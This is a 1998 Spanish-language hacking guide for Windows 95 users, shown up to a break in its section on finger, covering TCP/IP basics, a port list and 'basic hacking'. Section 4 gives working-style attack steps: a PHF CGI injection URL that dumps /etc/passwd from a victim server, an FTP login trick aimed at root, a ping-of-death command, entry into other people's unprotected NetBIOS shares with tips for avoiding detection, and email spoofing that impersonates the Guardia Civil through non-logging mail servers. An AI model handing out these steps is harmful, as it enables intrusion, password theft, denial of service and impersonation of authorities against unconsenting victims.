home *** CD-ROM | disk | FTP | other *** search
/ SuperHack / SuperHack CD.bin / documentos / super.txt < prev    next >
Text File  |  1999-05-11  |  83KB  |  2,368 lines

  1.                                                                    13-01-1998.
  2.                                                                       ??????                                                                     
  3.                       ░▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░
  4.                       ░▒╔═════════════════════════════╗▒░
  5.                       ░▒║┌  LA SUPER GUIA DEL HACKER ┐║▒░
  6.                       ░▒║│╔═════════════════════════╗│║▒░
  7.                       ░▒║│╚═════════════════════════╝│║▒░
  8.                       ░▒║└        by NOBODY          ┘║▒░ 
  9.                       ░▒╚═════════════════════════════╝▒░
  10.                       ░▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░
  11.  
  12.  
  13. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
  14.  
  15.   Nota Del Autor: No me hago responsable de la mala utilizacion de la
  16.                   informacion aqui expuesta ya que tan solo es para fines
  17.                   didacticos.
  18.                   Esta guia es de distribucion libre excepto para las
  19.                   instituciones gubernamentales que deberan abonar 2000 pts
  20.                   a alguna fundacion para apadrinar niños.
  21.  
  22. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
  23.  
  24.   - INDICE:
  25.  
  26.   1 ......................... Que Es Esta Guia Exactamente ?
  27.   2 ......................... Descripcion General De Windows.
  28.    2a ....................... Seguridad En Windows.
  29.   3 ......................... Protocolo TCP/IP y Demas Historias.
  30.    3a ....................... Puertos.
  31.    3b ....................... Ftp.
  32.    3c ....................... Telnet.
  33.   4 ......................... Hacking Basico En Windows. 
  34.    4a ....................... Phf.
  35.    4b ....................... Ftp.
  36.    4c ....................... Ping De La Muerte.
  37.    4d ....................... Recursos Compartidos.
  38.    4e ....................... Fake Mail Con El Telnet.
  39.    4f ....................... Cambiando El Entorno.
  40.    4g ....................... Finger.
  41.    4h ....................... Whois.
  42.    4i ....................... Tracert.
  43.   5 ......................... Utilizacion De Tools.
  44.    5a ....................... SkamWerks Lab version 1.1b.
  45.    5b ....................... WaReZ! Version 95.12.31.
  46.    5c ....................... John the Ripper v1.4.
  47.    5d ....................... Gobbler v 2.1.
  48.    5e ....................... Modificando el WS_FTP.
  49.    5f ....................... Sharepasswd.
  50.    5g ....................... Snadboy's Revelation v1.1.
  51.    5h ....................... Keylog95.
  52.    5i ....................... Glide.
  53.    5j ....................... Win95 AnonyMail v 1.0.
  54.    5k ....................... Hacker's Utility, V 1.02.
  55.    5l ....................... Haktek v1.1.
  56.    5m ....................... Claymore Brute Force.
  57.   6 ......................... Medidas De Seguridad.
  58.    6a ....................... Protegiendo Nuestro Ordenador.
  59.     6a1 ..................... Ataques Tipicos a Nuestro Windows.
  60.     6a2 ..................... Encriptacion De Nuestra Informacion.
  61.     6a3 ..................... Eliminar Informacion De Forma Segura.
  62.     6a4 ..................... Eliminacion De Virus.
  63.    6b ....................... Protegiendo Nuestras Acciones.
  64.     6b1 ..................... Borrando Nuestras Huellas.
  65.     6b2 ..................... Encriptando Nuestro Correo.
  66.   7 ......................... Sugerencias Para Un Mejor Hacking.
  67.   8 ......................... Obtener Informacion.
  68.   9 ......................... Despedida.
  69.    9a ....................... Agradecimientos.
  70.  
  71. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
  72.  
  73.   1. Que Es Esta Guia Exactamente ?
  74.  
  75.   Esta guia esta enfocado hacia todo aquel que quiere ser hacker pero no
  76.   quiere aprender unix o no lo sabe manejar (grave error). Pues por esta
  77.   razon esta guia esta enfocada a los usuarios de windows, principalmente
  78.   los de win95. Por el contrario esta guia no se dedicara al NT o Unix,
  79.   aunque por supuesto se hara referencia a estos sistemas sobre todo cuando
  80.   son estos mismos Sistemas Operativos en los cuales se centraran nuestros
  81.   actos, supuestamente legales :)
  82.  
  83.   Todo esto que digo puede sonar tonterias y puedes p0ensar que en win95 no
  84.   podras llegar a ser un gran hacker porque es necesario conocer unix, y
  85.   estoy totalmente de acuerdo, pero solo pretendo dar una oportunidad para
  86.   hacer sus pinitos a aquellos que solo saber usar win95, yo por mi parte
  87.   aconsejo aprender unix por varias razones que no viene a cuento en esta
  88.   guia.
  89.  
  90.   Con esta guia te convertiras en un magnifico Hacker usando un sistema que
  91.   no es propenso al hacking. Como es normal al usar win95 estaremos muy
  92.   limitados en muchos aspectos pero podras aprender por ejemplo, algunos
  93.   bug que podras usar en tu favor, la utilizacion de diversas herramientas
  94.   hacker que no estan disponibles generalemente en win95 y ademas a usar los
  95.   recursos que te ofrece Internet en tu favor, abreviando un poco tanta
  96.   charla, llegaras a conocer la red de una forma diferente y a manejar win95
  97.   de forma distinta a lo conocido hasta ahora.
  98.  
  99.   2. Descripcion General De Windows.
  100.  
  101.   Como todos sabemos el windows95 es un popular sistema operativo de la casa
  102.   Microsoft, el cual es conocido tanto por sus adepto ya que es muy sencillo
  103.   y vistoso pero al igual tambien es muy conocido por su inseguridad en casi
  104.   todos sus aspectos, ademas no ofrece tanta versativilidad como otros
  105.   sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la cual
  106.   es virtual y no real, si quieres hacer la prueba pon en marcha el defrag y
  107.   ejecuta otro programa :) y veras esa famosa Multitarea.
  108.  
  109.   El win95 es un sistema operativo de 32 bits multitarea, que es muy comodo
  110.   para la gente que busca facilidad, pero no te engañes pensando que es un
  111.   sistema ideal para Internet, puede que para un usuario convencional le sea
  112.   estupendo pero para un Hacker se queda muy corto de calle, ya que le falta
  113.   muchos servicios que otros sistemas operativos si traen como el que ya
  114.   tantas veces he repetido, el Unix (se nota que me encanta??:).
  115.  
  116.   Aqui os dejo de dar la murga sobre win95 ya que este texto no esta destinado
  117.   a hablar sobre este sistema sino a usarlo para hackear. Ademas no creo que
  118.   este contando nada nuevo sobre windows o sea que mejor me callo y si no
  119.   sabes mucho sobre win95, pues ya sabes comprate un libro.
  120.  
  121.    2a. Seguridad En Windows.
  122.  
  123.   Como todos sabemos la seguridad en win95 es nula, es decir, win95 no tiene
  124.   seguridad por si mismo, un claro ejemplo de esto que es las ventanas que
  125.   nos piden un password las podemos cerrar pulsando sobre la X o tambien
  126.   nos basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventana
  127.   sin meter ningun password. 
  128.  
  129.   Por eso para que nuestro ventanas (nombre que se le da a win95:) tendremos
  130.   que instalarle algun paquete de seguridad disponible por la red, que hay
  131.   muchos y buenos y lo mejor es que son Freeware (gratis) aunque siempre
  132.   puedes comprar algun paquete comercial de seguridad, en mi opinion alguna
  133.   veces una tonteria, ya que nos pueden cobrar un precio abusivo y cuando
  134.   llega la oportunidad de demostrar su calidad nos falla, ya que no hay nada
  135.   seguro 100%.
  136.  
  137.   Proteger nuestro win95 es cosa de cada uno pero tranquilidad, que la cosa
  138.   no es muy dificil, es cuestion de estar atento a las novedades, en otras
  139.   palabras estar informado. Mas abajo ya te entereras de estas cosas.
  140.  
  141.   3. Protocolo TCP/IP y Demas Historias.
  142.  
  143.   El protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya que
  144.   engloba casi todos los servicios que solemos usar como por ejemplo cuando
  145.   hacemos telnet, mail, ftp o cualquier cosa.
  146.  
  147.   TCP/IP proviene de Transmission Control Protocol y Internet Protocol
  148.   respectivamente. Por fortuna para los usuarios de win95, este protocolo
  149.   ya viene incorporado nativamente en el sistema, al contrario que ocurria
  150.   con el windows 3.x, el cual lo teniamos que instalar para poder conectar
  151.   a Internet.
  152.  
  153.   Como has podido comprobar en realidad son 2 protocolos pero que estan
  154.   unidos, el primero o sea el TCP es el encargado de las comunicaciones y de
  155.   la transmision de los paquetes cuando estamos conectados a un servidor. El
  156.   IP es el encargado de que los paquetes llegen a destino por orden aunque
  157.   tomen caminos diferentes.
  158.  
  159.                      * Diagrama del TCP *   
  160.  
  161.         cliente ->  El cliente le envia una  -> servidor
  162.                     solicitud de conexion
  163.                     espeficicando el puerto
  164.                     de conexion al servidor.
  165.  
  166.         cliente <-  El servidor le responde  <- servidor
  167.                     que conoce su peticion
  168.                     de conexion.
  169.  
  170.         cliente ->  El cliente le devuelve   <- servidor
  171.                     otra vez la peticion y
  172.                     el circuito ya esta
  173.                     abierto.
  174.  
  175.                      * Diagrama del IP *
  176.  
  177.        │Informacion general│Direccion IP│Direccion IP│Datos│ 
  178.        │de cabezera.       │de origen   │de destino. │     │
  179.  
  180.   Pues aqui se acaba la explicacion basica de este protocolo, para el que
  181.   este interesado en profundizar le remito a que se pille el RFC 1180 o un
  182.   fichero disponible en multitud de servidores, desgraciadamente no te puede
  183.   asegurar el nombre del fichero ya que lo he encontrado de varias formas
  184.   pero te dare el nombre que aparece al editarlo, ya que en todos es igual:
  185.   
  186.                              Introduction
  187.                                   to
  188.                         the Internet Protocols
  189.  
  190.                       C                       R
  191.  
  192.                               C       S
  193.                   Computer Science Facilities Group
  194.                               C       I
  195.  
  196.                       L                       S
  197.  
  198.                                RUTGERS
  199.                   The State University of New Jersey
  200.  
  201.                              3 July 1987
  202.   
  203.    3a. Puertos
  204.  
  205.   Antes ya os he explicado muy brevemente la comunicacion del protocolo en
  206.   cuestion. Pues ahora os pongo una extensa lista sobre los distintos
  207.   puertos y sus servicios correspondientes. 
  208.  
  209.     echo                7/tcp
  210.     echo                7/udp
  211.     discard             9/tcp    sink null
  212.     discard             9/udp    sink null
  213.     systat             11/tcp
  214.     systat             11/tcp    users
  215.     daytime            13/tcp
  216.     daytime            13/udp
  217.     netstat            15/tcp
  218.     qotd               17/tcp    quote
  219.     qotd               17/udp    quote
  220.     chargen            19/tcp    ttytst source
  221.     chargen            19/udp    ttytst source
  222.     ftp-data           20/tcp
  223.     ftp                21/tcp
  224.     telnet             23/tcp
  225.     smtp               25/tcp    mail
  226.     time               37/tcp    timserver
  227.     time               37/udp    timserver
  228.     rlp                39/udp    resource      # resource location
  229.     name               42/tcp    nameserver
  230.     name               42/udp    nameserver
  231.     whois              43/tcp    nicname       # usually to sri-nic
  232.     domain             53/tcp    nameserver    # name-domain server
  233.     domain             53/udp    nameserver
  234.     nameserver         53/tcp    domain        # name-domain server
  235.     nameserver         53/udp    domain
  236.     mtp                57/tcp                  # deprecated
  237.     bootp              67/udp                  # boot program server
  238.     tftp               69/udp
  239.     rje                77/tcp    netrjs
  240.     finger             79/tcp
  241.     link               87/tcp    ttylink
  242.     supdup             95/tcp
  243.     hostnames         101/tcp    hostname      # usually from sri-nic
  244.     iso-tsap          102/tcp
  245.     dictionary        103/tcp    webster
  246.     x400              103/tcp                  # ISO Mail
  247.     x400-snd          104/tcp
  248.     csnet-ns          105/tcp
  249.     pop               109/tcp    postoffice
  250.     pop2              109/tcp                  # Post Office
  251.     pop3              110/tcp    postoffice
  252.     portmap           111/tcp
  253.     portmap           111/udp
  254.     sunrpc            111/tcp
  255.     sunrpc            111/udp
  256.     auth              113/tcp    authentication
  257.     sftp              115/tcp
  258.     path              117/tcp
  259.     uucp-path         117/tcp
  260.     nntp              119/tcp    usenet        # Network News Transfer
  261.     ntp               123/udp    ntpd ntp      # network time protocol (exp)
  262.     nbname            137/udp
  263.     nbdatagram        138/udp
  264.     nbsession         139/tcp
  265.     NeWS              144/tcp    news
  266.     sgmp              153/udp    sgmp
  267.     tcprepo           158/tcp    repository    # PCMAIL
  268.     snmp              161/udp    snmp
  269.     snmp-trap         162/udp    snmp
  270.     print-srv         170/tcp                  # network PostScript
  271.     vmnet             175/tcp
  272.     load              315/udp
  273.     vmnet0            400/tcp
  274.     sytek             500/udp
  275.     biff              512/udp    comsat
  276.     exec              512/tcp
  277.     login             513/tcp
  278.     who               513/udp    whod
  279.     shell             514/tcp    cmd           # no passwords used
  280.     syslog            514/udp
  281.     printer           515/tcp    spooler       # line printer spooler
  282.     talk              517/udp
  283.     ntalk             518/udp
  284.     efs               520/tcp                  # for LucasFilm
  285.     route             520/udp    router routed
  286.     timed             525/udp    timeserver
  287.     tempo             526/tcp    newdate
  288.     courier           530/tcp    rpc
  289.     conference        531/tcp    chat
  290.     rvd-control       531/udp    MIT disk
  291.     netnews           532/tcp    readnews
  292.     netwall           533/udp                 # -for emergency broadcasts
  293.     uucp              540/tcp    uucpd        # uucp daemon
  294.     klogin            543/tcp                 # Kerberos authenticated rlogin
  295.     kshell            544/tcp    cmd          # and remote shell
  296.     new-rwho          550/udp    new-who      # experimental
  297.     remotefs          556/tcp    rfs_server rfs# Brunhoff remote filesystem
  298.     rmonitor          560/udp    rmonitord     # experimental
  299.     monitor           561/udp                  # experimental
  300.     garcon            600/tcp
  301.     maitrd            601/tcp
  302.     busboy            602/tcp
  303.     acctmaster        700/udp
  304.     acctslave         701/udp
  305.     acct              702/udp
  306.     acctlogin         703/udp
  307.     acctprinter       704/udp
  308.     elcsd             704/udp                  # errlog
  309.     acctinfo          705/udp
  310.     acctslave2        706/udp
  311.     acctdisk          707/udp
  312.     kerberos          750/tcp    kdc          # Kerberos authentication--tcp
  313.     kerberos          750/udp    kdc          # Kerberos authentication--udp
  314.     kerberos_master   751/tcp                 # Kerberos authentication
  315.     kerberos_master   751/udp                 # Kerberos authentication
  316.     passwd_server     752/udp                 # Kerberos passwd server
  317.     userreg_server    753/udp                 # Kerberos userreg server
  318.     krb_prop          754/tcp                 # Kerberos slave propagation
  319.     erlogin           888/tcp                 # Login and environment passing
  320.     kpop             1109/tcp                 # Pop with Kerberos
  321.     phone            1167/udp
  322.     ingreslock       1524/tcp
  323.     maze             1666/udp
  324.     nfs              2049/udp                  # sun nfs
  325.     knetd            2053/tcp                  # Kerberos de-multiplexor
  326.     eklogin          2105/tcp                  # Kerberos encrypted rlogin
  327.     rmt              5555/tcp    rmtd
  328.     mtb              5556/tcp    mtbd          # mtb backup
  329.     man              9535/tcp                  # remote man server
  330.     w                9536/tcp
  331.     mantst           9537/tcp                  # remote man server, testing
  332.     bnews           10000/tcp
  333.     rscs0           10000/udp
  334.     queue           10001/tcp
  335.     rscs1           10001/udp
  336.     poker           10002/tcp
  337.     rscs2           10002/udp
  338.     gateway         10003/tcp
  339.     rscs3           10003/udp
  340.     remp            10004/tcp
  341.     rscs4           10004/udp
  342.     rscs5           10005/udp
  343.     rscs6           10006/udp
  344.     rscs7           10007/udp
  345.     rscs8           10008/udp
  346.     rscs9           10009/udp
  347.     rscsa           10010/udp
  348.     rscsb           10011/udp
  349.     qmaster         10012/tcp
  350.     qmaster         10012/udp
  351.    
  352.   La verdad es que no te quejaras :) de esta lista. Si quieres mas
  353.   informacion sobre los puertos con su debida explicacion mirate el RFC 1060.
  354.  
  355.    3b. Ftp.
  356.  
  357.   Supongo que a estas alturas sabras lo que es el FTP, File Transfer Protocol
  358.   o sea Protocolo de Transferencia de Ficheros y como podras observar en el
  359.   listado de los puertos al FTP le corresponde el 21. Este servicio hay que
  360.   conocerlo muy bien ya que ademas que nos sirve para subir o bajar ficheros
  361.   tambien nos puede ayuda en nuestros propositos :), por supuesto el hacking.
  362.  
  363.   Sino dispones de ningun cliente FTP, el propio win95 lleva incorporado uno,
  364.   el unico problema es que no es muy vistoso ya que funciona en modo MS-DOS
  365.   pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta que
  366.   activemos una ventana MS-DOS y en la linea de comados escribamos FTP y se
  367.   pondra en modo FTP. Un ejemplo seria esto:
  368.  
  369.   c:\>ftp   <- Escribimos FTP.
  370.  
  371.   ftp>      <- activado el modo FTP.
  372.  
  373.   Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los
  374.   comandos disponibles del FTP, como no viene a cuento no los explicare pero
  375.   buscando por hay podras hallar informacion de lo que hace cada cosa pero
  376.   lo mejor es que lo averigues tu solito.
  377.  
  378.    3c. Telnet.
  379.  
  380.   Por suerte los usuarios de win95 con el telnet tienen mas suerte o menos
  381.   segun se mire, ya que el servico de Telnet de win95 que tambien esta
  382.   incorporado en el sistema, es muy facil de manejar y ademas tiene ventana
  383.   propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que
  384.   tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui
  385.   la de "sistema remoto", entonces se activara otra ventana en la que
  386.   nos saldra tres opciones, la primera "nombre de host" es donde queremos
  387.   conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo
  388.   tenemos "tipo de terminal" que no hace falta cambiarlo.
  389.  
  390.   El telnet es importante ya que es asi como entramos a una cuenta en un
  391.   servidor y podremos hacer lo que tengamos permitido en el sistema.
  392.   Logicamente entraremos en una cuenta si tenemos el login y password.
  393.  
  394.   4. Hacking Basico En Windows. 
  395.  
  396.   Por fin ya se a acabo el latazo de la explicacion de como moverse por
  397.   win95. Ahora ya podemos empezar a jugar un poco por inet :), siempre
  398.   por puro placer pero jamas con malos fines.
  399.  
  400.   En esta seccion os explicare varias maneras de hacking usando el win95 a
  401.   pelo o sea sin utilizar ninguna herramienta externa.
  402.  
  403.    4a. Phf.
  404.  
  405.   La primera tecnica ya es muy conocida y la verdad es que tendremos suerte
  406.   si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay
  407.   que saber buscar y tener paciencia.
  408.  
  409.   Para que esto nos funcione solo tenemos que tener un navegador instalado
  410.   en nuesto win95, por defecto suele venir el IE o sea que no podras decir
  411.   que no tienes, siempre y cuando hallas instalado los paquetes extras.
  412.  
  413.   Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que
  414.   corra sobre unix (muchos). Conectamos con un servidor en cuestion,
  415.   www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le
  416.   añadimos:
  417.  
  418.   http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  419.  
  420.   Como ya he dicho si todo sale bien nos aparecera el fichero de passwords
  421.   del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto
  422.   el PHF tiene muchas variantes por eso te aconsejo que busce algo que
  423.   profundice en esta tecnica al igual que tambien busce informacion sobre
  424.   el fichero passwd de unix para comprenderlo.
  425.  
  426.    4b. Ftp.
  427.  
  428.   Antes ya te he explicado el funcionamiento del FTP de win95, ahora lo
  429.   usaremos para sacer el fichero de password de un servidor. Desde una
  430.   ventana del MS-DOS llamamos al programa FTP y escribimos:
  431.  
  432.   ftp> open victima.com
  433.   Conect to victima.com
  434.   220 victim.com FTP server ready.
  435.  
  436.   ftp> quote user ftp
  437.   331 Guest login ok, send ident as password.
  438.  
  439.   ftp> quote cwd ~root
  440.   530 Please login with USER and PASS.
  441.  
  442.   ftp> quote pass ftp
  443.   230 Guest login ok, access restrictions apply.
  444.  
  445.   ftp> dir (o lo que querramos)
  446.  
  447.   Y como siempre es el caso si todo sale bien estaremos metidos en el
  448.   sistema como root (en lenguaje unix significa el superusuario, o sea el
  449.   que controla el servidor). Por desgracia esta tecnica es muy antigua por
  450.   lo que mas seguro no funcionara pero todo es posible.
  451.  
  452.    4c. Ping De La Muerte.
  453.  
  454.   Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir
  455.   Cracker para no ofender a nadie :) ya que unicamente sirve para tirar un
  456.   servidor o sea que se desconecta de Internet y esto puede representar
  457.   grandes perdidas a una empresa. Con esto solo os quiero decir que aunque
  458.   aqui os lo explicare no es cuestion que lo useis por Internet atacando
  459.   servidores.
  460.  
  461.   La utilidad Ping sirve principalmente para saber si un servidor esta activo
  462.   y ademas podemos calcular el trafico en la red segun el tiempo de su
  463.   respuesta. Basicamente se le envia un paquete a un servidor y este nos
  464.   contesta, solo que si se le envia un paquete muy grande puede llegar
  465.   desordenado, por lo que el servidor pide al origen que le vuelva a enviar
  466.   una parte o la totalidad del paquete, por lo que se produce un datagrama
  467.   del ping muy grande y producira su caida. Para ejecutar este ataque solo
  468.   tenemos que escribir :
  469.  
  470.   c:\>ping -l 65510 victima.com 
  471.  
  472.   Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes
  473.   de hacer tonterias leed la parte sobre seguridad de la guia.
  474.  
  475.    4d. Recursos Compartidos.
  476.    
  477.   Como win95 NO tiene seguridad nos permite colarnos en el disco duro de
  478.   otra persona por Internet y lo mejor del caso es que esta tecnica nos la
  479.   proporciona los propios programas del win95. Por supuesto no todo es tan
  480.   sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala
  481.   configuracion del propio usuario al no configurar adecuadamente los
  482.   recursos compartidos de su red corriendo sobre win95.
  483.  
  484.   Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador
  485.   bien configurado, o sea el compartir recursos bien puesto y tambien tener
  486.   el Netbios instalado. Para configurarlo, tenemos que tener activado la
  487.   opcion de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red.
  488.   SI por el caso la opcion esta desactivada simplemente pulsamos el boton de
  489.   "añadir" y añadimos el servicio "Compartir ficheros e impresoras en redes
  490.   Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion"
  491.   en "Cliente para redes Microsoft". Tambien tiene que estar activado el
  492.   "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso
  493.   Telefonico a Redes->Conexion a Inet que usaremos->boton derecho->
  494.   propiedades, debiendo estar activada la casilla "conectarse a la red".
  495.  
  496.   Ahora ya podemos ponernos manos a la obra, entonces volvemos a una
  497.   ventana del MS-DOS y ejecutamos:
  498.  
  499.   c:\>nbtstat -A (IP DE LA VICTIMA)
  500.  
  501.     NetBIOS Remote Machine Name Table
  502.  
  503.     Name               Type         Status
  504.     ---------------------------------------------
  505.     VICTIMAMACHINE    <00>    UNIQUE     Registered
  506.     VICTIMAGROUP      <00>    GROUP      Registered
  507.     VICTIMAMACHINE    <03>    UNIQUE     Registered
  508.     VICTIMAMACHINE    <20>    UNIQUE     Registered
  509.     VICTIMAGROUP      <1E>    GROUP      Registered
  510.  
  511.     MAC Address = 44-45-53-54-00-00
  512.  
  513.   Cuando ejecutamos este comando nos saldra una tabla como esta y el
  514.   primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes
  515.   ver la maquina se llama VICTIMAMACHINE.
  516.  
  517.   Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso
  518.   encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP
  519.   y el nombre de la maquina en cuestion, esto seria de la siguiente forma:
  520.  
  521.   c:\>edit c:\windows\system32\LMHOSTS
  522.  
  523.     VICTIMAMACHINE
  524.  
  525.   Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos
  526.   un comando para añadir el ordenador de la victima a nuestro Netbios y
  527.   esto seria de la siguiente forma:
  528.   
  529.   c:\>NBTSTAT -R
  530.  
  531.   Ahora nos interesa saber que recursos comparte la victima y esto tampoco
  532.   nos traera complicacion alguna:
  533.  
  534.   c:\>net view \\VICTIMAMACHINE
  535.  
  536.    Shared resources at \\VICTIMAMACHINE
  537.  
  538.    Sharename    Type         Comment
  539.    -----------------------------------------
  540.    BANCO        Disk
  541.  
  542.   Y como podemos observar comparte una carpeta llamada BANCO.
  543.  
  544.   Ahora ya podemos operar como si fuese una terminal mas en nuestra red local
  545.   sobre win95. Ya solo nos queda ejecutar el comando que querramos, si por
  546.   ejemplo queremos ver el contenido, solo tenemos que escribir:
  547.  
  548.   c:\> dir \\VICTIMAMACHINE\BANCO
  549.  
  550.   O para leer cualquier fichero de la carpeta:
  551.  
  552.   c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT
  553.  
  554.   Si queremos conectar al recurso compartido de forma grafica (o sea con
  555.   una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar
  556.   INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible
  557.   si hemos añadido la VICTIMAMACHINE a una unidad de red a la que podamos
  558.   llamar, deberemos ejecutar:
  559.  
  560.   c:\>NET USE e: \\MIPC\WINDOWS
  561.  
  562.   Esta tecnica solo funciona si la maquina remota ejecuta win95 o win 3.11 y
  563.   ademas comparte las carpetas sin contraseña en modo "Acceso a nivel
  564.   compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase
  565.   el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en
  566.   esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina
  567.   para que este autorizada, esto lo conseguiremos con el Regedit, por
  568.   desgracia los sistemas win95 y OSR2 que estan ejecutando el Servidor Web
  569.   Personal de Microsoft desactivan esta posibilidad de acceso remoto tras
  570.   informar de la conveniencia de hacerlo al usuario, ya que el servidor web
  571.   obliga a compartir carpetas aun sin tener red local.
  572.  
  573.   Logicamente un usuario que haya tenido el despiste de conectarse a Internet
  574.   con carpetas compartidas no toma luego medidas de control sobre quien
  575.   entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser
  576.   pillados si por ejemplo un usuario ejecuta el programa Netwatch, que
  577.   muestra los usuarios conectados a nuestra computadora en cada momento y por
  578.   supuesto el nombre de las computadoras por lo que es aconsejable cambiar el
  579.   nombre de nuestra computadora usando el Regedit. Si nuestra maquina se
  580.   llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con
  581.   el Regedit a un nombre menos sospechoso.
  582.  
  583.   Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra
  584.   computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos
  585.   una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se
  586.   dara cuenta de nuestra entrada. Tambien hay que decir que si la
  587.   VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo
  588.   "hay otros usuarios conectados a su ordenador, si apaga se desconectaran"
  589.   si ocurre esto seremos pillados.
  590.  
  591.    4e. Fake Mail Con El Telnet.
  592.  
  593.   Esta tecnica nos ayuda a suplantar la direccion de correo electronica que
  594.   querramos :). La verdad es que tiene pocos usos, en mi opinion debido a
  595.   una serie de razones pero siempre puede servir para gastar una buena
  596.   broma enviando aun amigo un mail del director de la Universidad diciendo
  597.   que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la
  598.   Guardia Civil.
  599.  
  600.   La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar
  601.   unas ciertas medidas de seguridad, que ya explicare luego. Lo primero
  602.   que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del
  603.   Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner
  604.   el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos
  605.   a que nos conectemos a ese puerto, cuando conectemos nos saldra un
  606.   mensaje y esta esperando a que pulsemoa alguna tecla:
  607.  
  608.     220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
  609.     [d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT) 
  610.  
  611.   Muchas veces lo que podemos hacer es escribir "help" y saldran todos los
  612.   comandos, tambien podemos escribir "echo" y la maquina nos contestara que
  613.   esta lista. Para escribir un mail hay que seguir una serie de pasos:
  614.  
  615.    mail from:gc.uco@mad.servicom.es <- ponemos de donde viene.
  616.  
  617.   El servidor nos contesta:
  618.  
  619.    250 <gc.uco@mad.servicom.es> ... Sender Okay 
  620.  
  621.   Ahora escribimos:
  622.  
  623.    rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos.
  624.  
  625.   El servidor nos contesta:
  626.  
  627.    250 <nob_ody@xxxxxxxx.com> ... Recipiant Okay 
  628.  
  629.   Ahora escribimos:
  630.  
  631.    data 
  632.  
  633.   El servidor nos contesta:
  634.  
  635.    354 Enter mail, end with "." on a line by itself 
  636.  
  637.   Ahora escribimos:
  638.  
  639.    To: nob_ody@xxxxxxxx.com 
  640.    From: gc.uco@mad.servicom.es 
  641.    Subject: Te querremos!! 
  642.    Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te
  643.    querremos fichar para el departamento.
  644.                                               Direccion General de
  645.                                                 la Guardia Civil
  646.    .  <- para terminar el mail.
  647.  
  648.   El servidor nos contesta:
  649.  
  650.    250 Mail accepted 
  651.  
  652.   Ahora escribimos:
  653.  
  654.    quit  <- ya esta todo listo :)
  655.  
  656.   Pues ves como es realmente simple!! Pero antes de empezar a jugar con
  657.   esta tecnica tenemos que asegurarnos que el servidor de mail no regrista
  658.   nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a
  659.   alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail
  660.   sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet
  661.   sobre servidores que permiten hacer esto.
  662.  
  663.    4f. Cambiando El Entorno.
  664.  
  665.   Esta tecnica no es que sea propia del hacking ya que solo sirve para
  666.   cambiar la pantalla de inicio o la de finalizar windows. Los logos de
  667.   windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros
  668.   con extension SYS pero siguen siendo realmente BMP'S.
  669.  
  670.   El logo del principio de windows (ya sabes el de las nubes) lo podeis
  671.   encontrar como:
  672.  
  673.   c:\>logo.sys
  674.  
  675.   Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo
  676.   y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro
  677.   grafico y si lo volvemos a quitar, usara el de siempre. El logo del final
  678.   (cuando cierra windows) esta en el directorio windows y lo podemos
  679.   encontrar como:
  680.  
  681.   c:\windows>logos.sys
  682.  
  683.   Logicamente es obligatorio que los graficos que querramos sustituir
  684.   tengan de tamaño 320x400 y sean ficheros BMP'S. Conviene que les pongamos
  685.   el atributo de ocultos, que esto se hace con el comando Attrib, por
  686.   ejemplo:
  687.  
  688.   c:\windows>attrib +h logos.sys <- lo oculta.
  689.  
  690.   c:\windows>attrib -h logos.sys <- lo hace visible.
  691.  
  692.    4g. Finger.
  693.  
  694.   La utilidad Finger, muy usada en Unix, en realidad no esta disponible en
  695.   Win95 pero como somos Hackers nosotros si que somos capaces desde Win95.
